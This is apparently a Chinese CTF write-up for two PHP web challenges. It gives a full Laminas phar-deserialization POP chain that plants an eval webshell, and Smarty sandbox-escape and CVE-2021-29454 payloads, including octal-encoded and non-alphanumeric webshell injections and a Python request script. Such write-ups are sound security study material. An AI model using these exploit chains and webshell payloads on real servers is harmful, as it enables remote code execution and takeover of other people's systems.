Fan website
存在源码泄露,www.zip
审计代码,发现一个album路由,且有一个控制器module/Album/src/Controller/AlbumController.php
,控制器能实现上传,删除等操作。
在上传部分可以看到过滤了
preg_match("/<\?|php|HALT\_COMPILER/i", $cont )
从这里猜测应该是phar反序列化,那么我们还需要一个触发点,在文件删除操作调用了unlink
函数
接下来就是找链子,由于提示了laminas组件,我们搜索相关漏洞
https://xz.aliyun.com/t/8975#toc-0
文章中有现成的链子,但我们还需要绕过题目的过滤,总体思路如下:
phar反序列化
gzip绕过对字符的过滤
利用上传传入压缩过的phar文件
更改后缀为jpg,绕过白名单
脏字符绕过大小限制
删除点利用phar协议触发执行
POC如下:
<?php
namespace Laminas\View\Resolver{
class TemplateMapResolver{
protected $map = ["setBody"=>"system"];
}
}
namespace Laminas\View\Renderer{
class PhpRenderer{
private $__helpers;
function __construct(){
$this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
}
}
}
namespace Laminas\Log\Writer{
abstract class AbstractWriter{}
class Mail extends AbstractWriter{
protected $eventsToMail = ["echo '<?php eval(\$_POST[1]);?>' > /var/www/public/a.php"];
protected $subjectPrependText = null;
protected $mail;
function __construct(){
$this->mail = new \Laminas\View\Renderer\PhpRenderer();
}
}
}
namespace Laminas\Log{
class Logger{
protected $writers;
function __construct(){
$this->writers = [new \Laminas\Log\Writer\Mail()];
}
}
}
namespace{
$a = new \Laminas\Log\Logger();
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$phar->setMetadata($a); //将自定义的 meta-data 存入 manifest
$phar->addFromString("test.txt", str_repeat('aaa',1000000)); //添加要压缩的文件
$phar->stopBuffering();
}
?>
访问/album/imgupload
上传图片,album/imgdelete
删除图片
phar:///var/www/public/img/7218dc37139fd1776abe383cf3e0266f.png
Smarty Calculator
依旧是源码泄露,下载www.zip
<?php
error_reporting(0);
include_once('./Smarty/Smarty.class.php');
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->php_modifiers = null;
$my_security_policy->static_classes = null;
$my_security_policy->allow_super_globals = false;
$my_security_policy->allow_constants = false;
$my_security_policy->allow_php_tag = false;
$my_security_policy->streams = null;
$my_security_policy->php_modifiers = null;
$smarty->enableSecurity($my_security_policy);
function waf($data){
$pattern = "php|\<|flag|\?";
$vpattern = explode("|", $pattern);
foreach ($vpattern as $value) {
if (preg_match("/$value/", $data)) {
echo("<div style='width:100%;text-align:center'><h5>Calculator don not like U<h5><br>");
die();
}
}
return $data;
}
if(isset($_POST['data'])){
if(isset($_COOKIE['login'])) {
$data = waf($_POST['data']);
echo "<div style='width:100%;text-align:center'><h5>Only smarty people can use calculators:<h5><br>";
$smarty->display("string:" . $data);
}else{
echo "<script>alert(\"你还没有登录\")</script>";
}
}
这里设置了登录验证COOKIE,添加login=1
即可。接下来对提交数据经过waf处理后调用$smarty->display
。
可以发现smarty版本
搜索一下相关漏洞:
https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html
Smarty_Internal_Runtime_TplFunction Sandbox Escape PHP 代码注入
POC:
data={function+name='rce(){};system("id");function%0A%0A'}{/function}
这里用换行来绕过sysplugins\smarty_internal_compile_function.php
中的正则
CVE-2021-29454
漏洞利用点在src/Smarty/plugins/function.math.php
,通过调用eval进行命令执行
这里需要绕过正则过滤,可以用8进制或者无字母数字webshell
- 八进制绕过
写文件
("file_put_contents")("1.php","<?php eval($_POST[1]);?>")
转换
data={math equation="(\"\\146\\151\\154\\145\\137\\160\\165\\164\\137\\143\\157\\156\\164\\145\\156\\164\\163\")(\"\\61\\56\\160\\150\\160\",\"\\74\\77\\160\\150\\160\\40\\145\\166\\141\\154(\\44\\137\\120\\117\\123\\124\\133\\61\\135)\\73\\77\\76\")"}
蚁剑连接即可
- 无字母数字webshell
import requests
import urllib.parse
url="http://c5e30757-f8da-4886-b42f-b35734e624da.node4.buuoj.cn:81"
data={'data':urllib.parse.unquote(''' {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }''')}
r=requests.post(url,data=data,cookies={'login':'1'})
print(r.text)
访问/a
即可